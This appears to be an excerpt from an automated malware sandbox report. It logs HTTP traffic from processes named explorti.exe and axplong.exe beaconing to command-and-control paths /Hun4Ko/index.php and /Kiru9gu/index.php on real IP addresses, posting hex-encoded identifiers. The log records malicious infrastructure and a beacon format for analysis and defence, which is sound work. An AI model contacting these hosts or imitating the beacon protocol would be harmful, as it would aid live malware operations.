                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        31192.168.2.64985777.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:23.678128958 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:24.495481014 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:24 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:24.510164976 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:24.729430914 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:24 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        32192.168.2.64985877.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:24.161576033 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:24.885452032 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:24 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:24.892407894 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:25.116003990 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:25 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        33192.168.2.64985977.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:24.848887920 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:25.547496080 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:25 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:25.548188925 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:25.767523050 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:25 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        34192.168.2.64986077.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:25.244869947 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:25.939502954 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:25 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:25.940323114 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:26.159663916 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:26 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        35192.168.2.64986177.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:25.878736019 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:26.575325966 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:26 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:26.576690912 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:26.795811892 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:26 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        36192.168.2.64986277.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:26.341897964 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:27.102070093 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:26 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:27.102809906 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:27.322000027 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:27 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        37192.168.2.64986377.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:26.930988073 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:27.682456017 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:27 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:27.686232090 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:27.914258003 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:27 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        38192.168.2.64986477.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:27.470999002 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:29.095010996 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:28 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:29.103852034 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:29.106646061 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:28 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:29.114559889 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:28 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:29.121037006 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:28 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:29.672310114 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:29 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0
                                                                                        Jul 24, 2024 07:15:29.676058054 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:29 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        39192.168.2.64986577.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:29.122518063 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:29.895417929 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:29 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:29.898179054 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:30.137111902 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:30 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        40192.168.2.64986777.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:29.785778046 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:30.529526949 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:30 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:30.534734011 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:30.763573885 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:30 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        41192.168.2.64986885.28.47.31809912C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exe
                                                                                        TimestampBytes transferredDirectionData
